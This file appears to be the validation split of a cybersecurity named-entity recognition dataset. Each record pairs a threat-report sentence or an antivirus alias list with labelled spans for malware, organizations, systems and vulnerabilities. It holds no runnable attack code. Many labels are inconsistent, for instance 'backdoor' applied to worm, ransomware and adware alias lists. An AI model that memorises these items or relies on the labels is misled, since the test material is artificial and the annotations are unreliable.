{"text": "A backdoor also known as: W32.Clode6c.Trojan.3552 TrojanAPT.ScarCruft.DB5 Trojan.ScarCruft Trojan.Scarcruft TROJ_SCRUFT.A Troj.W32.Scarcruft!c TROJ_SCRUFT.A Trojan.ScarCruft.a Trojan[:HEUR]/Win32.ScarCruft Backdoor:Win32/ScarCruft.A!dha Trojan.ScarCruft! Trj/GdSda.A", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000115", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: Worm/W32.Newpic.32768.B Worm.Newpic Worm.Choke.Win32.6 W32.W.Newpic.d!c WORM_NEWPIC.D W32.Choke.Worm Win32/Annoying.32768.B WORM_NEWPIC.D Email-Worm.Win32.Newpic.d Trojan.Win32.Newpic.fwiy I-Worm.Win32.Newpic.D Win32.HLLM.Choke.32678 Backdoor.VB W32/Risk.UNPB-0819 I-Worm/Newpic.d WORM/NewPic.D Worm[Email]/Win32.Newpic Trojan.Heur.VB.EAA4AA Email-Worm.Win32.Newpic.d Worm:Win32/Jermsg.C Win32/Newpic.worm.32768.B Worm.Newpic W32/Choke.B.worm Win32/Choke.E Win32.Worm-email.Newpic.Pcil I-Worm.Newpic.D W32/Choke.D!worm Win32/Worm.ff1", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000116", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: Trojan/W32.Gimemo.658944.C Trojan-Ransom.Win32.Gimemo!O Trojan.Gimemo.Win32.6352 Trojan.Graftor.D1C40B W32.Dompie Trojan-Ransom.Win32.Gimemo.bcdt Trojan.Win32.Gimemo.cqlzku Trojan.AVKill.30965 Trojan.Gimemo.us W32.Gimemo.Bcdt Trojan[Ransom]/Win32.Gimemo Ransom:Win32/Somhoveran.A Trojan-Ransom.Win32.Gimemo.bcdt Trojan/Win32.Gimemo.R89518 TScope.Trojan.Delf Trojan.Gimemo!HSGdw3uyR7g Trojan.Win32.Somhoveran", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000117", "source": "cyner2_valid"}}
{"text": "They do this not only to identify whether the use of a particular app may permit them to harvest another credential , but also because each targeted app needs to have an overlay mapped to its design , so the Trojan can intercept and steal user data .", "spans": {}, "info": {"id": "cyner2_valid_000118", "source": "cyner2_valid"}}
{"text": "Since then, researchers saw an increasing number of instances in the wild and have traced the attack campaign's source.", "spans": {}, "info": {"id": "cyner2_valid_000122", "source": "cyner2_valid"}}
{"text": "In October 2012, malware attacks against Israeli government targets grabbed media attention as officials temporarily cut off Internet access for its entire police force and banned the use of USB memory sticks.", "spans": {"Organization: Israeli government": [[41, 59]], "Organization: media": [[76, 81]]}, "info": {"id": "cyner2_valid_000123", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9999 Backdoor.Win32.Ircbot.SAZA Trojan.OneX.2 BehavesLike.Win32.Trojan.ch Trojan:Win32/Imsproad.A BScope.Trojan-Dropper.1291 Backdoor.Bot Win32.Trojan.Spy.Lkmy Worm.Slenfbot!aV8aXWGMSmc Trojan.Win32.Imsproad W32/Slenfbot.AJ!tr", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000124", "source": "cyner2_valid"}}
{"text": "Super Mario Run Malware # 2 – DroidJack RAT Gamers love Mario and Pokemon , but so do malware authors .", "spans": {"Malware: Super Mario Run Malware": [[0, 23]], "Malware: DroidJack RAT": [[30, 43]], "System: Mario": [[56, 61]], "System: Pokemon": [[66, 73]]}, "info": {"id": "cyner2_valid_000127", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: W32.OnGamesLT180912HKGHAAI.Trojan Trojan-GameThief.Win32.OnLineGames!O Win32.Trojan.WisdomEyes.16070401.9500.9983 Troj.PSW32.W.OnLineGames.lcpY Trojan.Click3.15544 BehavesLike.Win32.PWSOnlineGames.cc Trojan.Zlob Trojan/PSW.GamePass.pmn Trojan/Win32.Unknown Win32.Troj.Undef.kcloud TrojanDownloader:Win32/Winical.A BScope.Trojan.QQhelper Trj/Pupack.A Win32/Trojan.3c4", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000128", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9968 Trojan.Win32.AVKill.ewqzay Trojan.AVKill.60640 BehavesLike.Win32.MultiPlug.dc Trojan.Ursu.DBD1B Ransom:Win32/Tescrypt.T Trojan.Crypt Trj/GdSda.A", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000129", "source": "cyner2_valid"}}
{"text": "In doing so, we discovered that it's been a very profitable year for SamSa, with an estimated $450,000 in ransom payments from samples we have identified.", "spans": {}, "info": {"id": "cyner2_valid_000131", "source": "cyner2_valid"}}
{"text": "Th 64KB buffer is used as a VM descriptor data structure to store data and the just-in-time ( JIT ) generated code to run .", "spans": {}, "info": {"id": "cyner2_valid_000132", "source": "cyner2_valid"}}
{"text": "This is on top of its normal ransomware routines, giving the attackers two ways to profit off of one infection.", "spans": {"Malware: ransomware": [[29, 39]], "Malware: infection.": [[101, 111]]}, "info": {"id": "cyner2_valid_000134", "source": "cyner2_valid"}}
{"text": "Stage 2 : Exodus Two The Zip archive returned by the check-in performed by Exodus One is a collection of files including the primary payload mike.jar and several compiled utilities that serve different functions .", "spans": {"Malware: Exodus Two": [[10, 20]], "Malware: Exodus One": [[75, 85]]}, "info": {"id": "cyner2_valid_000135", "source": "cyner2_valid"}}
{"text": "Most malware found on Google Play contains only a dropper that later downloads the real malicious components to the device .", "spans": {"System: Google Play": [[22, 33]]}, "info": {"id": "cyner2_valid_000136", "source": "cyner2_valid"}}
{"text": "Next , the loader checks that it ’ s not running in a virtualized environment ( VMWare or Hyper-V ) or under a debugger .", "spans": {"System: VMWare": [[80, 86]], "System: Hyper-V": [[90, 97]]}, "info": {"id": "cyner2_valid_000137", "source": "cyner2_valid"}}
{"text": "The infection routine for BARTALEX uses a Microsoft Word document and social engineering lure that is widely recognized by enterprises—making infection all too possible.", "spans": {"Malware: BARTALEX": [[26, 34]], "System: Microsoft Word": [[42, 56]]}, "info": {"id": "cyner2_valid_000138", "source": "cyner2_valid"}}
{"text": "However, while the malware used in these new attacks uses similar infection mechanisms to PlugX, it is a completely new tool with its own specific behavior patterns and architecture.", "spans": {"Malware: malware": [[19, 26]], "Malware: attacks": [[45, 52]], "Malware: PlugX,": [[90, 96]], "Malware: tool": [[120, 124]]}, "info": {"id": "cyner2_valid_000139", "source": "cyner2_valid"}}
{"text": "Once the keyword is present , the SDK will switch from innocent ads server to malicious payload delivery ones .", "spans": {}, "info": {"id": "cyner2_valid_000140", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: Trojan.Pitit.A3 Trojan.Barys.DC7C4 TROJ_APPROM.SM TROJ_APPROM.SM Trojan.Win32.Clicker.ctxopv W32.Email.Worm.Silly TR/Kazy.65836 Trojan:MSIL/Pitit.A Trojan.FakeMS.ED Win32/Trojan.118", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000141", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: Trojan.WasaladCS.S1416205 Trojan.Zbot.Win32.204389 Trojan.Zbot.241 Win32.Trojan.WisdomEyes.16070401.9500.9853 W32/Trojan2.PXIY Trojan-Spy.Win32.Zbot.yidv Trojan.PWS.Panda.5255 Trojan.Crypt W32/Trojan.YBOL-4127 TrojanSpy.Zbot.fkmq TR/Crypt.Xpack.dvziu Trojan-Spy.Win32.Zbot.yidv TrojanSpy.Zbot Trojan.Crypt Win32/Spy.Zbot.YW TrojanSpy.Zbot!3x6SCEc6VcA", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000142", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: Trojan.Win32.VB!O Win32.Trojan.WisdomEyes.16070401.9500.9997 W32/Trojan.YDPN-6125 Trojan.Win32.VB.dmom Win32.Trojan.Patched.Lors BehavesLike.Win32.VBObfus.gh Trojan:Win32/Cotfuser.A Trojan.Win32.VB.dmom BScope.Trojan.Diple Trojan.Vundo W32/VB.QDB!tr", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000143", "source": "cyner2_valid"}}
{"text": "An example of some actions these modules perform is spreading by posting click-bait messages on Facebook and VKontakte Russian social network.", "spans": {"System: Facebook": [[96, 104]], "System: VKontakte Russian social network.": [[109, 142]]}, "info": {"id": "cyner2_valid_000144", "source": "cyner2_valid"}}
{"text": "In the 2015-early 2016 versions examined in this article , C & C instructions in JSON format contained the name of the command in text form ( “ get_sms ” , “ block_phone ” ) .", "spans": {}, "info": {"id": "cyner2_valid_000145", "source": "cyner2_valid"}}
{"text": "In each case, the threat actor was injecting malicious code into customer-facing web pages and collecting information about visitors' environments, and redirecting them to malicious sites.", "spans": {"Malware: malicious code": [[45, 59]], "System: visitors' environments,": [[124, 147]]}, "info": {"id": "cyner2_valid_000147", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: W97m.Downloader.FAN W97M.Downloader.WF W97M.Downloader TROJ_FRS.0NA003BN17 Doc.Dropper.MagicHound-5859115-0 W97m.Downloader.FAN Trojan.Ole2.Vbs-heuristic.druvzi W97m.Downloader.FAN W97m.Downloader.FAN W97M.DownLoader.1378 TROJ_FRS.0NA003BN17 TrojanDownloader:O97M/Powmet.A HEUR.VBA.Trojan.d W97m.Downloader.FAN W97m.Downloader.FAN heur.macro.powershell.b", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000149", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: TrojanDownloader.Bemidal W32/Trojan.LCLF-2053 Trojan.Win32.Banload.dukboc Trojan.Win32.Z.Banload.442880.A Troj.Downloader.W32.CodecPack.lz0R BehavesLike.Win32.PUPXAC.gc TR/Dldr.Banload.nclqj Trojan[Downloader]/Win32.Banload Trojan.Symmi.D8A7 Trj/GdSda.A Win32.Trojan.Symmi.Wsae Trojan-Downloader.Win32.Banload W32/Banload.VXF!tr.dldr Win32/Trojan.a4f", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000150", "source": "cyner2_valid"}}
{"text": "myjino .ru/ htdocs/gateway/gate.php?uuid=Personal ID of your computer, for example: 4df7065b1d049d098526344faaabf3f8", "spans": {}, "info": {"id": "cyner2_valid_000151", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: W32/Trojan.SKWY-4323 Win.Trojan.4173078-1 Worm.BAT.Autorun.gg Trojan.Win32.Autorun.uxdwl Worm.BAT.Autorun.gg!c Trojan.MulDrop2.32245 Worm.AutoRun.Win32.32285 BehavesLike.Win32.Virus.pt W32/Trojan2.NFKY Worm.BAT.bx WORM/Moopidoop.A.6 Worm.Autorun.kcloud Worm.BAT.Autorun.gg Worm:Win32/Moopidoop.A Dropper/Win32.Xema.C65666 Worm.BAT.Autorun Bat.Worm.Autorun.Pfad Worm.BAT.Autorun BAT/Autorun.GG!worm", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000152", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: Ransomware.DMALocker.A5 Ransom_MADLOCKER.SMLV Win32.Trojan-Ransom.DMALocker.B Trojan.Win32.Z.Dmalocker.221184.CG TrojWare.Win32.Ransom.DMALocker.C Trojan:W32/DMALocker.A Trojan.Encoder.4199 Trojan/Filecoder.DMALocker.c Trojan.Ransom.Dmalocker.A TR/Ransom.tvnwt Win32.Trojan.Cryptor.Heur Ransom.DMALocker Trojan.Filecoder!Hm27KMcAqqg Trojan-Ransom.FileCoder W32/Kryptik.35100!tr Win32/Trojan.Ransom.f7b", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000153", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: Trojan.Dacic.FC.1014 Win32.Trojan.WisdomEyes.16070401.9500.9978 Win.Trojan.8151962-1 Backdoor.Msil.Spygate!c Win32.Trojan.Spy.Tbik Trojan.DownLoader7.18225 W32/Trojan.YFXC-2645 TrojanSpy.MSIL.chc Trojan[Spy]/MSIL.KeyLogger Trojan.MSIL.Krypt.4 Backdoor:Win32/Shadow.H TrojanSpy.MSIL.KeyLogger Trojan.MSIL.Spy MSIL/Autorun.VOST!tr Win32/Backdoor.Spy.f85", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000154", "source": "cyner2_valid"}}
{"text": "Make sure that all other apps installed and the device operating systems are updated to the latest version .", "spans": {}, "info": {"id": "cyner2_valid_000155", "source": "cyner2_valid"}}
{"text": "Trend Micro ’ s Mobile App Reputation Service ( MARS ) covers Android and iOS threats using leading sandbox and machine learning technologies , protecting devices against malware , zero-day and known exploits , privacy leaks , and application vulnerabilities .", "spans": {"Organization: Trend Micro": [[0, 11]], "System: Mobile App Reputation Service": [[16, 45]], "System: Android": [[62, 69]], "System: iOS": [[74, 77]]}, "info": {"id": "cyner2_valid_000156", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9879 Trojan.Win32.Miner.tajv Trojan.Win32.Miner.euuymf BehavesLike.Win32.Trojan.wc TR/BAS.FakeAlert.31018885 Trojan.Win32.Miner.tajv Trojan:Win32/Grudapa.A!bit Trj/CI.A Win32.Trojan.Miner.Pcsx", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000157", "source": "cyner2_valid"}}
{"text": "List of anti-virus packages that are checked The payload goes a long way to protect itself and checks for anti-virus software installed on the mobile device .", "spans": {}, "info": {"id": "cyner2_valid_000158", "source": "cyner2_valid"}}
{"text": "A brief update on infrastructure associated with the IcedID dropper malware, as well as a brief window of time, has been published by the S2 Research Team, based on pDNS and certificate data.", "spans": {"Malware: IcedID dropper malware,": [[53, 76]], "Organization: the S2 Research Team,": [[134, 155]]}, "info": {"id": "cyner2_valid_000160", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: Trojan.Crypt.CG Trojan-Dropper/W32.Microjoin.14850 Troj.Dropper.W32.Microjoin.af!c Trojan/Dropper.Microjoin.af Trojan.DR.Microjoin!u0/JcLBzSFg Trojan.Dropper Win32/PSW.LdPinch TROJ_LDPINCH.EC Worm.Bagle-120 Trojan-Dropper.Win32.Microjoin.af Trojan.Crypt.CG Trojan.Win32.Microjoin.hjzu Trojan.Crypt.CG TrojWare.Win32.PSW.LdPinch Trojan.Crypt.CG Dropper.Microjoin.Win32.280 TROJ_LDPINCH.EC BehavesLike.Win32.Downloader.lh TrojanDropper.Microjoin.ko TR/Drop.Microj.AF.2 W32/Dropper.MLTR!tr Trojan[Dropper]/Win32.Microjoin Trojan.Crypt.CG Dropper/Microjoin.37500 Virus.Win32.Heur.c MalwareScope.Trojan-PSW.Pinch.1 W32/Bagle.N Trojan-Dropper.Win32.Microjoin Trojan.Crypt.CG Dropper.Tiny.U", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000162", "source": "cyner2_valid"}}
{"text": "This change came hand in hand with a new overlay target list , no longer targeting social apps , but focusing on banking instead .", "spans": {}, "info": {"id": "cyner2_valid_000163", "source": "cyner2_valid"}}
{"text": "Libya maybe known in non-stable political system, civil war and militant groups fighting for the land and oil control but it is definitely not known in cyber malicious activities, cyber espionage and hacking groups.", "spans": {"Organization: militant groups": [[64, 79]]}, "info": {"id": "cyner2_valid_000164", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: W32.DownloadGovdi.Trojan TrojanDownloader.Govdi Trojan/Crapmisc.d Win32.Trojan.WisdomEyes.16070401.9500.9999 TROJ_GOGLOAD.A Trojan.Click2.56232 TROJ_GOGLOAD.A W32/Trojan.FUNZ-7719 DangerousObject.Multi.fel TR/Spy.11264.242 Trojan.Heur.RP.EAB002 TrojanDownloader:Win32/Govdi.A Trojan/Win32.Downbot.R164559 Win32.Trojan.Gogload.Ssgo Trojan.Win32.Spy", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000165", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: Adware.ICLoader.A3 Win32.Trojan.Kryptik.nz Trojan.Win32.AdLoad.dxenuj Application.Win32.ICLoader.NW Adware.SmartInstallerCRTD.Win32.6482 PUA.Win32.Dlhelper AdWare.ICLoader.v PUA/ICLoader.pos GrayWare[AdWare]/Win32.ICLoader.iue Trojan.Application.Bundler.ICLoader.19 Adware/Win32.ICLoader.R165698 AdWare.ICLoader Adware.ICLoader PUA.SmartInstaller! W32/Kryptik.DXUS!tr Win32/Virus.dc6", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000166", "source": "cyner2_valid"}}
{"text": "In such situations , mobile users should always take the utmost precautions while downloading any applications from the internet .", "spans": {}, "info": {"id": "cyner2_valid_000167", "source": "cyner2_valid"}}
{"text": "This article is a result of an initial investigation, no attribution is done but you'll have all the necessary info for a deeper investigation.", "spans": {}, "info": {"id": "cyner2_valid_000168", "source": "cyner2_valid"}}
{"text": "The malware developer uses various tactics to do so , and one of them is using Android 's broadcast receivers .", "spans": {"System: Android": [[79, 86]]}, "info": {"id": "cyner2_valid_000170", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: Win32/Downeks.G Trojan.DownLoader24.20994 Trojan.Win32.Downeks W32/Trojan.HWYN-3481 TrojanDropper.Autoit.bpu TR/Downeks.nsanv Trj/CI.A Win32/Trojan.Downloader.132", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000171", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: Trojan.Cometer Win.Trojan.MSShellcode-6360728-0 Troj.W32.Cometer!c Trojan.Cometer.Win32.323 Trojan.Cometer.dt Trojan/Win32.Cometer Trojan:Win32/Metasploit.X", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000172", "source": "cyner2_valid"}}
{"text": "The malware has been in the wild for over 10 months, but out of 57 security vendors in VirusTotal, only one is detecting the malware at the time of this writing.", "spans": {"Malware: malware": [[4, 11], [125, 132]], "Organization: 57 security vendors": [[64, 83]], "Organization: VirusTotal,": [[87, 98]]}, "info": {"id": "cyner2_valid_000173", "source": "cyner2_valid"}}
{"text": "We're also seeing Astrum redirected by the Seamless malvertising campaign, which is known for using the Rig exploit kit.", "spans": {"Malware: the Rig exploit kit.": [[100, 120]]}, "info": {"id": "cyner2_valid_000174", "source": "cyner2_valid"}}
{"text": "Iranian Threat Agent Greenbug has been registering domains similar to those of Israeli High-Tech and Cyber Security Companies.", "spans": {"Malware: Greenbug": [[21, 29]], "Organization: Israeli High-Tech": [[79, 96]], "Organization: Cyber Security Companies.": [[101, 126]]}, "info": {"id": "cyner2_valid_000175", "source": "cyner2_valid"}}
{"text": "FireEye has detected a new attack by the Angler Exploit Kit EK that exploits CVE-2015-3090 in Adobe Flash Player.", "spans": {"Organization: FireEye": [[0, 7]], "Malware: Angler Exploit Kit EK": [[41, 62]], "Vulnerability: exploits CVE-2015-3090": [[68, 90]], "System: Adobe Flash Player.": [[94, 113]]}, "info": {"id": "cyner2_valid_000176", "source": "cyner2_valid"}}
{"text": "What this means for you All Lookout customers are protected from this threat .", "spans": {"Organization: Lookout": [[28, 35]]}, "info": {"id": "cyner2_valid_000177", "source": "cyner2_valid"}}
{"text": "Malware code showing decryption of assets Figure 10 .", "spans": {}, "info": {"id": "cyner2_valid_000178", "source": "cyner2_valid"}}
{"text": "PluginPhantom also gains the ability to evade the static detection by hiding malicious behaviors in plugins.", "spans": {"Malware: PluginPhantom": [[0, 13]], "Malware: malicious behaviors": [[77, 96]], "System: plugins.": [[100, 108]]}, "info": {"id": "cyner2_valid_000179", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: W32.HfsAutoB.6419 Worm.NSIS.Voterai.H Win32.Trojan.WisdomEyes.16070401.9500.9712 W32/Trojan-Gypikon-based.DM2!Ma W32.Voterai Win.Trojan.Agnido-1 Trojan.NSIS.Voter.a Trojan.Nsis.Voter.cxlgfm BehavesLike.Win32.BadFile.fz W32/Trojan-Gypikon-based.DM2!Ma Worm:Win32/Voterai.H Trojan.Heur.ED15C23 Worm/Win32.Voterai.R75943", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000180", "source": "cyner2_valid"}}
{"text": "Figure 13 : placeholder classes in Boot module Technical Analysis – Patch Module When “ Agent Smith ” has reached its goal – a malicious payload running inside the original application , with hooks on various methods – at this point , everything lies with maintaining the required code in case of an update for the original application .", "spans": {"Malware: Agent Smith": [[88, 99]]}, "info": {"id": "cyner2_valid_000181", "source": "cyner2_valid"}}
{"text": "One prevalent campaign in the wild with this remote access trojan is the use of a Microsoft OneNote spear phishing attachment to load a .HTA file that downloads and runs an obfuscated batch script to execute the actual AsyncRAT code.", "spans": {"Malware: remote access trojan": [[45, 65]], "System: Microsoft OneNote": [[82, 99]], "Malware: AsyncRAT code.": [[219, 233]]}, "info": {"id": "cyner2_valid_000182", "source": "cyner2_valid"}}
{"text": "Intercept Call - Triggers on incoming and outgoing calls .", "spans": {}, "info": {"id": "cyner2_valid_000183", "source": "cyner2_valid"}}
{"text": "Before she disappeared from Facebook, Mia Ash was a fun-loving, young photographer who used the world s biggest social network to showcase her work.", "spans": {"Organization: Facebook, Mia Ash": [[28, 45]], "Organization: social network": [[112, 126]]}, "info": {"id": "cyner2_valid_000184", "source": "cyner2_valid"}}
{"text": "] com through an upload queue .", "spans": {}, "info": {"id": "cyner2_valid_000185", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: VB:Trojan.VBA.Dropper.D W97M.Downloader.BPN W97M/Downloader.chr W97M.Downloader VB:Trojan.VBA.Dropper.D VB:Trojan.VBA.Dropper.D Trojan.Ole2.Vbs-heuristic.druvzi VB:Trojan.VBA.Dropper.D W97M/Downloader.chr Trojan.HRLT-5 Trojan:O97M/Syscon.A HEUR.VBA.Trojan.d VB:Trojan.VBA.Dropper.D Win32/Trojan.90c", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000186", "source": "cyner2_valid"}}
{"text": "Shell Crew, first named by RSA, has been incredibly proficient over time and breached numerous high-value targets.", "spans": {"Organization: RSA,": [[27, 31]]}, "info": {"id": "cyner2_valid_000187", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: Trojan.Win32.Inject!O Win32/RiskWare.PEMalform.E Win.Trojan.Blackshades-2 Tool.PassView.352 Troj.W32.VB.kYUh PWS:Win32/Bissldr.A Trojan.VB.Crypt W32/VBNA.BH!worm", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000189", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: HackTool.Nbsi.B HackTool.Win32.VB!IK W32/Hacktool.EXH Win32.NBSI HackTool.Win32.NBSI TrojWare.Win32.HackTool.NBSI SPR/NBSI.A.1 TROJ_DREAMCAT.B HackTool.Win32.NBSI Trojan.Win32.Nbsi.a HackTool.Win32.VB", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000192", "source": "cyner2_valid"}}
{"text": "LINE, an application that offers free calls and chat messages is commonly used in countries such as Taiwan, Japan, Indonesia, India, United States, Mexico, and Colombia among others.", "spans": {"Organization: LINE,": [[0, 5]]}, "info": {"id": "cyner2_valid_000193", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: W32.Clod0b5.Trojan.5aa7 Trojan/Asterope.a Win.Trojan.Asterope-1 Trojan.Win32.Z.Asterope.143872[h] Trojan.Asterope.Win32.5 BehavesLike.Win64.Dropper.ch W64/Asterope.A!tr Trojan:Win64/Ropest.G Trojan.Win64.Asterope.C Win32.Trojan.Atraps.Dygx Trojan.Win64.Asterope Dhupad.GEF Trj/CI.A Win32/Trojan.0fe", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000194", "source": "cyner2_valid"}}
{"text": "After all , a working product is often more important than a stable product .", "spans": {}, "info": {"id": "cyner2_valid_000195", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: Joke:Win32/VB.K Win-Trojan/Aub.24576 VB.BYG Win32/Trojan.d25", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000196", "source": "cyner2_valid"}}
{"text": "The attackers have taken down their communication channels and are probably looking for ways to assemble their tools in a different manner .", "spans": {}, "info": {"id": "cyner2_valid_000197", "source": "cyner2_valid"}}
{"text": "Targets and victims included ASEAN governmental agencies and government departments, investment enterprises, military, law enforcement and border control organizations, embassies, university faculties and others.", "spans": {"Organization: ASEAN governmental agencies": [[29, 56]], "Organization: government departments, investment enterprises, military, law enforcement": [[61, 134]], "Organization: border": [[139, 145]]}, "info": {"id": "cyner2_valid_000198", "source": "cyner2_valid"}}
{"text": "XLoader Android Spyware and Banking Trojan Distributed via DNS Spoofing We have been detecting a new wave of network attacks since early March , which , for now , are targeting Japan , Korea , China , Taiwan , and Hong Kong .", "spans": {"Malware: XLoader": [[0, 7]], "System: Android": [[8, 15]]}, "info": {"id": "cyner2_valid_000199", "source": "cyner2_valid"}}
{"text": "Further research showed that this component was the core of an operation involving multiple malware families we called Operation Windigo", "spans": {"Malware: multiple malware families": [[83, 108]]}, "info": {"id": "cyner2_valid_000200", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: W32.Fiorn.Worm Worm.VB.CJ3 Worm.Moriogu Win32.Trojan.WisdomEyes.16070401.9500.9943 W32/VBTrojan.17E!Maximus W32.SillyFDC Win32/Moriogu.A WORM_VB.FUP Trojan.Win32.Scar.wexu Backdoor.Win32.VB.NDU Trojan.Romeo Trojan.VB.Win32.116 WORM_VB.FUP BehavesLike.Win32.Vilsel.mt W32/VBTrojan.17E!Maximus Worm:Win32/Moriogu.A TR/VB.dnz Worm:Win32/Moriogu.A Trojan.Heur.EF86F4 Win32.Trojan.VB.YZ HEUR/Fakon.mwf SScope.Trojan.Validium.va Win32/VB.NJU", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000201", "source": "cyner2_valid"}}
{"text": "It is commonly exploited via the use of malicious Rich Text File RTF documents, a method used by the DRIDEX banking trojan discovered earlier this year.", "spans": {"Malware: exploited": [[15, 24]], "Malware: malicious": [[40, 49]], "Malware: DRIDEX banking trojan": [[101, 122]]}, "info": {"id": "cyner2_valid_000202", "source": "cyner2_valid"}}
{"text": "The Trojanized apps were hosted by several well-known Android mobile markets, including more than 400 detected on Google Play.", "spans": {"Malware: Trojanized apps": [[4, 19]], "System: Android mobile": [[54, 68]], "System: Google Play.": [[114, 126]]}, "info": {"id": "cyner2_valid_000203", "source": "cyner2_valid"}}
{"text": "The continuous scanning and exploitation of Elasticsearch servers is the most visible feature of these actors, and some actors have continued to infect and reinfect servers for weeks on end.", "spans": {"Vulnerability: exploitation": [[28, 40]], "System: Elasticsearch servers": [[44, 65]], "System: servers": [[165, 172]]}, "info": {"id": "cyner2_valid_000204", "source": "cyner2_valid"}}
{"text": "This family of ransomware is directly purchased from the author via the Internet.", "spans": {"Malware: family of ransomware": [[5, 25]]}, "info": {"id": "cyner2_valid_000206", "source": "cyner2_valid"}}
{"text": "The process starts when an SMS phishing message arrives at a user ’ s phone .", "spans": {}, "info": {"id": "cyner2_valid_000207", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: Trojan/W32.Small.27136.N Trojan.Win32.Small!O Trojan/Small.ahk Win32.Trojan.WisdomEyes.16070401.9500.9998 W32/Trojan2.AFIB W32.Joydotto Win32/Cog.A WORM_HIDDEN.B Win.Trojan.Small-8611 Trojan.Win32.Small.ahk Trojan.Win32.Small.yrzl Troj.W32.Small!c Win32.Trojan.Small.Wstp Worm.Win32.Small.NBW WORM_HIDDEN.B W32/Trojan.WQKI-8211 Trojan.Win32.Small.27136 Trojan.Win32.Small.ahk Worm:Win32/Stercogs.A Trojan.Small Win32/Small.NBW Trojan.Small!ci/rCB0aMMk W32/MSVC.F!tr Win32/Trojan.ce9", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000208", "source": "cyner2_valid"}}
{"text": "Link analysis of infrastructure and tools also revealed a potential relationship between Magic Hound and the adversary group called Rocket Kitten AKA Operation Saffron Rose, Ajax Security Team, Operation Woolen-Goldfish as well as an older attack campaign called Newscasters.", "spans": {"System: infrastructure": [[17, 31]], "Malware: tools": [[36, 41]], "Organization: Ajax Security Team,": [[174, 193]]}, "info": {"id": "cyner2_valid_000209", "source": "cyner2_valid"}}
{"text": "However, it is possible that their quantity will be constantly increasing, because virus writers are still busy distributing this malicious program.", "spans": {"Malware: malicious program.": [[130, 148]]}, "info": {"id": "cyner2_valid_000210", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: HackTool.Win32!O HackTool.SqlCrack Tool.SqlCrack.Win32.5 Trojan/Hacktool.sqlcrack Win32.HackTool.Sqlcrack.b W32/Trojan.UHQ Win.Tool.SQLCrack-2 HackTool.Win32.SqlCrack Riskware.Win32.SqlCrack.hros Win32.Hacktool.Sqlcrack.Efki TrojWare.Win32.HackTool.Sqlcrack Tool.SQLck W32/Trojan.EFFV-1692 HackTool.HDSI.c HackTool/Win32.SqlCrack HackTool:Win32/SqlCrack.A Trojan.Johnnie.D46D6 ToolKit.Win32.SqlCrack.73729 HackTool.Win32.SqlCrack HackTool.SqlCrack Win32/HackTool.Sqlcrack", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000211", "source": "cyner2_valid"}}
{"text": "The emails had subject lines that were intended to convince unsuspecting recipients that they were from a legitimate source.", "spans": {}, "info": {"id": "cyner2_valid_000212", "source": "cyner2_valid"}}
